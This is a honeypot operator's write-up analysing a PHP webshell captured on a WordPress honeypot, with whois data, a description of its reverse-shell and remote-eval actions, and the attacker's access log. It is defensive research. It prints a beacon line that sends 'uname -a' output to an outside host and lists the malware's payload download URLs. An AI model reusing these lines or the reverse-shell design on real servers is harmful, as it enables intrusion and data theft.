from 2015-05-26
This is a capture from an earlier incarnation of my WordPress honey pot. It arrived 2015-05-26. I behaved sloppier in 2015 than I do now, so I don't have a lot of relevant information about the IP address, and I didn't keep other captures from that campaign against my honey pot.
The older honey pot allowed WordPress login with any user ID/password combo. It also had a Web Shell by oRb (WSO) honey pot that was not as advanced as my current WSO honey pot. The old WSO honey pot may not have provided enough feedback about downloaded files to fool attackers into trying to access the URLs of files they thought got downloade by WSO.
It's a heavily modified version of the webrot.php that my honey pot
also captured as part of kinked theme activex.
Since I didn't grab information about 78.168.18.77 back in 2015, about the best I can say is that it's a TurkTelecom IP Address.
inetnum: 78.168.0.0 - 78.168.255.255
netname: TurkTelekom
descr: TT ADSL-TTnet_dynamic_ulus
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
created: 2007-09-10T09:20:39Z
last-modified: 2010-07-26T14:17:53Z
TurkTelekom has had that IPv4 /16 since 2007, last modifying it in 2010. 78.168.18.77 was almost certainly from Turkey in 2015.
p0f 2.x thought that IP address had "Windows Vista SP1, 7 SP1"
and the link was "pppoe (DSL)", which jibes with the "descr" of
the address range above.
The attackers apparently believed they downloaded a file to an instance of WSO/Web Shell by oRb/FilesMAn. They downloaded via HTTP POST request, with a very typical set of parameters for a WSO download.
| Parameter name | Value |
|---|---|
| a | FilesMAn |
| c | /var/www/html/ |
| p1 | uploadFile |
| charset | Windows-1251 |
The file downloaded was named izocin.php on the attacking computer.
I just pretty-printed it for readability. The original is so poorly-formatted that I can hardly make it out.
This illustrates that even SuperVillain Middle-East Hackers are very poor user interface designers. These folks made the basic mistake of an app being just a menu bar. Additionally, their sense of style is abominable.
The whole webshell works off the value of an HTTP GET method
parameter named BackConnect.
The code recognizes 30 different values of BackConnect.
Many of the 30 actions it performs are starting "back shells". That is, it creates an outgoing TCP socket to some IP address and well-known port, then starts a command interpreter on the compromised WordPress host with the TCP socket as its input and output. This circumvents any protection that a NAT internet connection provides. Since hardly anyone monitors outgoing traffic, it probably also circumvents most firewalls.
The back shells usually connect to TCP port 22 on the server from which the HTTP request comes from. TCP port 22 by convention is port on which SSH servers listen, but this code makes no attempt to do SSH. It's all in cleartext. The attacker would have to have a program running that listens on TCP port 22 for connections, then relays bytes to and from keyboard to the back shell.
Action "PHP_1" starts a back shell that's
built-in to izocin.php.
It uses pcntl_fork() to create a new process.
The new process actually does sensible things that any background daemon process should do,
like change directory to "/", remove any umask,
and set its session ID.
The new process uses fsockopen() to connect to TCP port 22 on
the server which made the HTTP request.
It creates pipes, connections them to a shell
process created with proc_open(),
and then multiplexes on socket and pipes using
stream_select().
Action PHP_12 is a builtin backdoor
that tries PHP builtins stream_socket_client(),
fsockopen(), and socket_create() in that order to create a socket.
If one of them doesn't work, the code uses the next.
It reads a 4-byte integer from the socket, then reads that many bytes of PHP from the socket, and eval's those bytes. This smells like a backdoor designed for use by other programs.
PHP_13 is the "PHP Connect-Back SyRiAn Sh3ll". It reads up to 65535 from the socket connection back to the HTTP invoking machine, executes them as a shell command string, then writes the result bytes back to the socket.
Some of the actions download files from other hosts,
creating .htaccess files that would cause Apache web servers
to run those downloaded files as CGI-BIN programs.
As of 2019-02-24, 5 years after my honey pot captured this code,
none of those files are available, and many of the host names
have no IP address in DNS.
- http://dzrecharge.tk/pv8L/jeentel
- http://dzrecharge.tk/pv8L/dz.txt
- http://dzrecharge.tk/pv8L/1.txt
- http://paradiseinpuntagorda.com/images/dc
Two of the web shell actions, PHP_2 and PHP_3, seem to exist just to do very simple "back connect" verification.
PHP_4 action would have downloaded http://paradiseinpuntagorda.com/images/dc,
and executed it with the invoking machine's IP address,
and port 22.
I assume it was some kind of back shell.
PHP_10 would have downloaded http://dzrecharge.tk/pv8L/1.txt
into a file autoroot/autoroot.txt, and marked it executable
without ever executing it.
Since the code doesn't create an .htaccess file for the
autoroot/ directory, it's unlikely anyone could invoke
whatever code this was via HTTP.
PHP_14 looks at the contents of /etc/named.conf,
tries to coordinate that with the owner of a file
in /etc/valiases that match DNS zones' names.
It prints out an HTML table of such matches.
The PHP_24 action seems to eval PHP code,
or maybe use the cURL libary to show you /etc/passwd.
I'm not sure, and the code looks wrong.
I just don't understand the PHP_25 action.
It has a variable named $shellcode which contains some
random-looking bytes, and possible a little-endian
representation of "/bin/sh".
It just doesn't look like the shell code gets executed.
The bulk of the actions Priv8 Attack Shell performs are implemented by chunks of code kept gzipped and Base64-encoded. Some of these are written to files, and invoked as CGI-BIN programs, others are immediately eval'ed by the PHP interpreter.
See internal_code subdirectory for dismaying details. These details indicate that "Priv8 Attack Shell" is just an evolved version of "webroot" or "webrootv3", something that's been around since 2013 or even earlier.
2019-02-23, iblogger.org is a namecheap.com domain:
priv8.iblogger.org canonical name = 11776.bodis.com.
Name: 11776.bodis.com
Address: 199.59.242.151
izocin.php tried to retrieve a 0x0 pixel "image" from www.iblogger.com,
really a web bug,
with a bit of code like this:
<font face="Wingdings"><img border="0" src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo (php_uname())?>";" width="0" height="0"></a></font>
As of 2019-02-23, priv8.iblogger.org will respond to that URL,
apparently with minified or obfuscated JavaScript
Below are the only accesses by 78.168.18.77 my web server recorded.
The attacker(s) did try some things interactively with psiqo.php,
and the WordPress honey pot.
I'm almost certain that the accesses listed below are interactive,
a human driving a browser,
because of two things.
- Access of URLs that no program every accesses, like
/favicon.ico, or/wp-admin/css/colors.min.css. - Automatic access is usually quite rapid.
Delays of several seconds occur between "major" URLs.
Rapid, sub-second access only occurs between major URLs,
and the URLs noted in (1) above: URLs referenced by
the major URLs in
src="..."attributes.
| Arrival Date | IP Address | URL accessed |
|---|---|---|
| 2015-05-26 13:14:32-06 | 78.168.18.77 | /wp-login.php:admin:11111 |
| 2015-05-26 13:14:38-06 | 78.168.18.77 | /wp-includes/css/dashicons.min.css?ver=3.8 |
| 2015-05-26 13:14:38-06 | 78.168.18.77 | /wp-admin/css/wp-admin.min.css?ver=3.8 |
| 2015-05-26 13:14:38-06 | 78.168.18.77 | /favicon.ico |
| 2015-05-26 13:14:38-06 | 78.168.18.77 | /wp-login.php |
| 2015-05-26 13:14:40-06 | 78.168.18.77 | /wp-admin/css/colors.min.css?ver=3.8 |
| 2015-05-26 13:14:40-06 | 78.168.18.77 | /wp-includes/css/buttons.min.css?ver=3.8 |
| 2015-05-26 13:14:47-06 | 78.168.18.77 | /wp-admin/images/wordpress-logo.svg?ver=20131107 |
| 2015-05-26 13:14:48-06 | 78.168.18.77 | /favicon.ico |
| 2015-05-26 13:14:58-06 | 78.168.18.77 | /wp-login.php |
| 2015-05-26 13:14:58-06 | 78.168.18.77 | /wp-admin/ |
| 2015-05-26 13:14:59-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1 |
| 2015-05-26 13:14:59-06 | 78.168.18.77 | /wp-admin/css/colors/blue/colors.min.css?ver=3.8.1 |
| 2015-05-26 13:14:59-06 | 78.168.18.77 | /wp-includes/js/thickbox/thickbox.css?ver=20131201 |
| 2015-05-26 13:14:59-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:00-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,customize-base,customize-loader,thickbox,plugin-install,underscor&load%5B%5D=e,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:08-06 | 78.168.18.77 | /wp-admin/themes.php |
| 2015-05-26 13:15:09-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,thickbox,underscore,backbone,wp-util,wp-backbone,theme,customize-base,customize-loader,svg-painter,&load%5B%5D=heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:09-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:09-06 | 78.168.18.77 | /wp-content/themes/twentytwelve/screenshot.png |
| 2015-05-26 13:15:09-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1 |
| 2015-05-26 13:15:17-06 | 78.168.18.77 | /wp-content/themes/twentyfourteen/screenshot.png |
| 2015-05-26 13:15:18-06 | 78.168.18.77 | /wp-content/themes/twentythirteen/screenshot.png |
| 2015-05-26 13:15:23-06 | 78.168.18.77 | /wp-admin/theme-install.php |
| 2015-05-26 13:15:24-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:26-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1 |
| 2015-05-26 13:15:29-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,theme-install,thickbox,theme-preview,svg-painter,heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:33-06 | 78.168.18.77 | / |
| 2015-05-26 13:15:34-06 | 78.168.18.77 | /vim.powered.by.vim.gif |
| 2015-05-26 13:15:38-06 | 78.168.18.77 | /wp-admin/theme-install.php?tab=upload |
| 2015-05-26 13:15:39-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1 |
| 2015-05-26 13:15:39-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:15:39-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,theme-install,thickbox,theme-preview,svg-painter,heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:16:34-06 | 78.168.18.77 | /wp-admin/update.php?action=upload-theme |
| 2015-05-26 13:18:12-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1 |
| 2015-05-26 13:18:12-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,customize-base,customize-loader,svg-painter&ver=3.8.1 |
| 2015-05-26 13:18:12-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons&ver=3.8.1 |
| 2015-05-26 13:18:43-06 | 78.168.18.77 | /wp-content/themes/320 |
| 2015-05-26 13:18:55-06 | 78.168.18.77 | /wp-admin/customize.php?theme=houston |
| 2015-05-26 13:18:55-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=customize-base,customize-controls,accordion,underscore,backbone,wp-util,wp-backbone,media-models,wp-plupload,jquery-ui-core,jque&load%5B%5D=ry-ui-widget,jquery-ui-mouse,jquery-ui-draggable,jquery-ui-slider,jquery-touch-punch,iris,wp-color-picker&ver=3.8.1 |
| 2015-05-26 13:18:55-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,json2,plupload,plupload-html5,plupload-flash,plupload-silverlight,plupload-html4&ver=3.8.1 |
| 2015-05-26 13:18:55-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,wp-admin,buttons,customize-controls,wp-color-picker&ver=3.8.1 |
| 2015-05-26 13:19:00-06 | 78.168.18.77 | /wp-admin/images/spinner.gif |
| 2015-05-26 13:19:03-06 | 78.168.18.77 | /wp-admin/themes.php?action=activate&template=p2&stylesheet=houston&_wpnonce=bc4c2029ae |
| 2015-05-26 13:19:04-06 | 78.168.18.77 | /wp-content/themes/twentyfourteen/screenshot.png |
| 2015-05-26 13:19:04-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:19:04-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1 |
| 2015-05-26 13:19:04-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,thickbox,underscore,backbone,wp-util,wp-backbone,theme,customize-base,customize-loader,svg-painter,&load%5B%5D=heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:19:05-06 | 78.168.18.77 | /wp-content/themes/twentyfourteen/screenshot.png |
| 2015-05-26 13:19:11-06 | 78.168.18.77 | /wp-content/themes/320 |
| 2015-05-26 13:19:21-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:19:38-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:20:06-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:20:18-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:20:40-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:22:22-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:22:32-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:22:39-06 | 78.168.18.77 | /wp-admin/theme-editor.php |
| 2015-05-26 13:22:39-06 | 78.168.18.77 | /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:22:40-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1 |
| 2015-05-26 13:22:41-06 | 78.168.18.77 | /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter,heartbeat,wp-auth-check&ver=3.8.1 |
| 2015-05-26 13:23:17-06 | 78.168.18.77 | /wp-admin/theme-editor.php?file=404.php&theme=twentytwelve |
| 2015-05-26 13:23:47-06 | 78.168.18.77 | /wp-admin/theme-editor.php |
| 2015-05-26 13:24:06-06 | 78.168.18.77 | /wp-content/themes/twentytwelve/404.php |
| 2015-05-26 13:25:07-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |
| 2015-05-26 13:25:17-06 | 78.168.18.77 | /wp-content/themes/320/psiqo.php |